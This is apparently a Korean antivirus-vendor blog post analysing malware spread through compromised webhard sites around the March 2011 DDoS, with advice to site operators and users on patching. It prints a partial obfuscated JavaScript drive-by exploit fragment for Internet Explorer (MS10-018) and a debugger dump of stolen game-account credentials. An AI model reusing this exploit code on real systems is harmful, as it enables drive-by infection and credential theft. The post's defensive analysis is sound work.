악성코드에 의해서 발생한 두 DDoS의 공통점은 예고되었고 인재(관리소홀)가 아니었을까?란 생각을 해 본다.
그 이유는 주말이면 기대를 저버리지 않고 일부 웹하드 사이트들에서 개인정보 유출형 악성코드를 유포하고 있는 것으로 확인되었기 때문이다.
2011.02 ~ 2011.03.07기간동안 일부 웹하드 사이트들에서 악성코드 유포 목적으로 발생한 침해사고 건수를 산출내 보았다. 법적으로 문제가 발생할 수 있기 때문에 정확한 업체명은 밝히지 않으며 알파벳 순으로 표기하였다.
[그림 1] 웹하드 사이트의 침해건수
악성코드가 유포되는 과정은 말로 설명하는 것보다는 아래 그림으로 요약해 볼 수 있겠다.
사용자 입장에서 가장 걱정되는 것은 아마 “악성코드를 유포하는 웹하드 사이트 접속하는 것만으로 감염되나요?”일 것이다.
결론부터 말하자면 악성코드에 감염될 조건은 아래 2 가지가 있다.
2. Internet Explorer에 보안 업데이트가 안되어 있을 경우
-. MS10-018: http://www.microsoft.com/korea/technet/security/bulletin/MS10-018.mspx
{
var sRHjGE4=”#default#userData”;
var qgSFdrF3 = document.createElement(hCpCFNB8);
qgSFdrF3.addBehavior(sRHjGE4);
document.appendChild(qgSFdrF3);
twPa4='s';
try
{
for (i=0;i<10;i++)
{
qgSFdrF3.setAttribute(twPa4,window);
}
}
catch(e)
{}
window.status+='';
}
var EFAOkeEGa56323567=”ea12atcEA6723″;
var KCLFa7lhGXL=new Array();
var ERAkcoaeElkEfa5632567=”atyo56326c5F69798kfl”;
var Fvlgf6t7eoyoa=”@UFP&51″+”0″+”d”+”0″+”d”+”@”+”UFP&51″+”0″+”d”+”0″+”d”;
Fvlgf6t7eoyoa=window[“x75x6ex65x73x63x61x70x65”](Fvlgf6t7eoyoa[“x72x65x70x6cx61x63x65″](/@UFP&51/g,”x25x75”));
var HKL7nhASDa5356ea32Z16578=””;
document.write(“
}
악성코드, 감염되면 어떤 피해를 입을까?
만약 사용자가 특정 온라인 게임 사용자라면 악성코드에 감염된 PC에서 해당 온라인 게임 사이트에 로그인 할 때 계정정보를 탈취한 후 특정 URL로 전송한다. 그럼 악성코드 제작자는 탈취한 계정정보를 브로커에게 전달하고 브로커는 탈취한 사용자 계정정보를 사용하여 사용자의 게임 사이템을 절취 및 판매하여 금전적 이득을 취하게 된다.
OllyDBG로 사용자가 입력한 계정정보가 HttpSendRequestA()의 인자값으로 전달된 상태를 살펴보면 아래와 같다.
|Arg1 = 00CC000C
|Arg2 = 00195FE0 “Referer: http://www.[게임사이트].net/”,CR,LF,”Accept-Language: ko”,CR,LF,”Content-Type: application/x-www-form-urlencoded”,CR,LF,”Accept-Encoding: gzip, deflate”
|Arg3 = FFFFFFFF
|Arg4 = 02A97B30 6C,”_id=test1111&l_pwd=test2222&l_domain=www.[게임사이트].net&l_dirurl=0&
l_url=http%3A%2F%2Fwww.[게임사이트].net%2F&l_”
|Arg5 = 000000A6
|Arg6 = 00000000
Arg7 = 00000013
[표 4] HttpSendRequestA()의 인자값으로 전달된 계정정보
1. 웹하드 사이트의 관리자에게 한마디
주말이 지나고 한 주의 시작을 알리는 월요일이면 웹하드 사이트의 관리자들로부터 항의성 메일이 접수된다. 자신들의 사이트는 악성코드를 유포하지 않으며 심각한 영업손실이 초래되므로 접속차단을 해제해 달라고….
심각한 영업손실이라, 그럼 그 영업이익이 누구로부터 나온단 말인가? 당연히 고객으로부터 나올 것이다.
근본적인 대책은 강구하지 않고 임시방편(삽입된 악성 URL삭제) 조치와 관리소홀로 인해서 악성코드 URL이 삽입의 되풀이와 이로 인해 웹하드 사이트에 접속하는 고객 PC가 악성코드 감염되어 고객의 애지중지하는 게임 아이템이 사라지면 이건 누가 보상해야하는가?
진정으로 고객을 생각하고 영업이익을 걱정한다면 웹하드 사이트에 주기적으로 삽입되는 악성 URL의 근본적인 해결방법에 대해서 강구해야할 것이다. 만약 그대로 방치한다면 고객으로부터 웹하드 사이트의 신뢰는 떨어질 것이고 결국 영업손실로 이어질 것이다. 고객은 바보가 아니다.
2. 일반 사용자에게 한마디
언제까지 보안 업데이트는 나 몰라라 하면서 악성코드 감염으로 인해서 발생하는 피해를 감수할 것인가?
보안 업데이트의 중요성은 귀에 딱지가 생기도록 여러 경로를 통해서 언급한바 있다.
-. 안철수연구소가 추천하는 보안정보:
http://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsList.do?menu_dist=5
사용자들은 지금의 인터넷 환경에서 편리함만 추구해서는 큰 문제가 발생할 수 있기에 보안도 함께 생각해야 한다는 것 알아야한다. 그리고 보안의 가장 기본이 바로 보안 업데이트라는 점 반드시 알야둬야 한다. 보안을 소홀히 함으로써 발생한 부작용은 언론을 통해서 여러번 보고된바 있다.
-. Windows Update : http://www.update.microsoft.com/windowsupdate/v6/default.aspx?ln=ko
[그림 6] Windows XP에서 보안 업데이트
[그림 7] Windows 7에서 보안 업데이트
하루에도 수십만개의 악성코드가 발견되고 또 소멸되고 있다.
오늘날 악성코드들은 사용자가 판단할 수 없는 교묘한 방법을 사용하여 악성코드를 실행하도록 유도하고 있어 전문가가 아닌 이상 아니 전문가도 한 순간에 방심할 수 있는 상황에서 일반 사용자들은 어떻겠는가?
현재 악성코드는 물량화, 지능화, 조직화등으로 점차 발전해가고 있다. 이는 백신의 시그니처 방식은 이제 한계에 도달했다는 것을 의미하며 이에 대한 대안으로 ASD(AhnLab Smart Defense)같이 좀더 포괄적이면서 빠르게 악성코드에 대응할 수 있는 기술들을 연구해야할 필요성이 있다는 것을 의미한다. 보안업체가 일반 사용자들의 보안 조력자로서 역할을 충실히 실행할 수 있도록….
이 자릴 빌어 이번 2011.3.4 DDoS 대응에 불철주야 고생한 업체관계자 분들께 고맙다는 말을 전하고 싶다.
4. 언론매체에게 한마디
5. 국가기관에게 한마디
2년 전 2009.7.7 DDoS때 얻은 교훈으로 이번 2011.3.4 DDoS는 피해를 최소화하면서 악성코드들을 빠르게 소멸시키는데 큰 역할을 했다. 하지만 이번에도 개선할 점은 분명히 있었을 것이다. 이번 2011.3.4 DDoS처럼 국가적으로 이슈가 되는 사건은 앞으로도 빈번히 발생할 수가 있기에 공조체제를 좀더 강화할 필요가 있을 것 같다.
악성코드가 일반 사용자들을 위협하는 것에서 이제는 국가 인프라를 위협하는 수준이다. 어느 한 곳만으로 해결하기에는 역부족일 수 있기에 이럴 때일 수도록 상호간의 공조가 체계적으로 이루어질 필요가 있을 것 같다.
Categories:악성코드 정보